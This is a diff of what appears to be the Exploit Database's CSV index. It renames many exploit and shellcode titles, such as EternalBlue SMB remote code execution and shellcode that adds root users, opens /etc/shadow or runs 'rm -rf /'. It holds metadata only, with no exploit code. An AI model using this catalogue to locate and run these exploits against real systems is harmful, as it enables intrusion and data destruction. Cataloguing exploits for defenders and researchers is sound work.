 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0
-34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0
+34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0
 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0
 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0
 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0
@ -9131,6 +9131,7 @@ id,file,description,date,author,platform,type,port
 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -12597,9 +12598,9 @@ id,file,description,date,author,platform,type,port
 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0
 21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0
 21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0
-21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
+21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
 21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
-21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0
+21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",multiple,remote,0
 21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote,0
 21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0
 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0
@ -12759,10 +12760,10 @@ id,file,description,date,author,platform,type,port
 21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0
 21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",multiple,remote,0
 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0
-21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0
+21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0
 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0
 21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,unix,remote,0
-21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0
+21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0
 21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote,0
 21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote,0
 21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0
@ -13352,7 +13353,7 @@ id,file,description,date,author,platform,type,port
 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0
 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
-24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
+24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
 24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
@ -13704,7 +13705,7 @@ id,file,description,date,author,platform,type,port
 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0
 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote,0
 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0
-25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0
+25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0
 25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,windows,remote,8001
 26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote,0
 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0
@ -15392,8 +15393,8 @@ id,file,description,date,author,platform,type,port
 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020
 38983,platforms/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080
 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0
-39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
+39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
-39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
+39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80
 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0
 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0
@ -15620,7 +15621,7 @@ id,file,description,date,author,platform,type,port
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
-42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
+42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
@ -15656,7 +15657,7 @@ id,file,description,date,author,platform,type,port
 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0
 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0
 42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0
-42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
+42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
 42022,platforms/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,windows,remote,0
 42023,platforms/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,windows,remote,23423
 42024,platforms/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,php,remote,0
@ -15689,8 +15690,8 @@ id,file,description,date,author,platform,type,port
 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
-42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
+42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
-42306,platforms/linux/remote/42306.txt,"NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,remote,0
+42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15736,14 +15737,14 @@ id,file,description,date,author,platform,type,port
 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0
 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0
-13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
+13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
-13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
+13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
 13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0
 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
@ -15754,7 +15755,7 @@ id,file,description,date,author,platform,type,port
 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
-13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
+13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
 13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0
 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0
@ -15765,13 +15766,13 @@ id,file,description,date,author,platform,type,port
 13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0
 13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0
 13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
-13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
+13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0
 13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0
 13320,platforms/lin_x86-64/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86-64,shellcode,0
 13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0
-13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
+13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
-13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl script execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
+13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0
-13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - file reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0
+13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - File Reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0
 13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0
 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
@ -15796,7 +15797,7 @@ id,file,description,date,author,platform,type,port
 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0
 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
-13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
+13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0
@ -15829,14 +15830,14 @@ id,file,description,date,author,platform,type,port
 13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
 13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0
 13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0
-13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0
+13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0
 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0
 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0
-13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 -  Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@ -15867,16 +15868,16 @@ id,file,description,date,author,platform,type,port
 13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0
 13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0
 13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0
-13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0
+13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0
-13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0
+13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0
 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0
 13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0
 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
 13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0
 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0
-13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
+13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
-13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
+13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
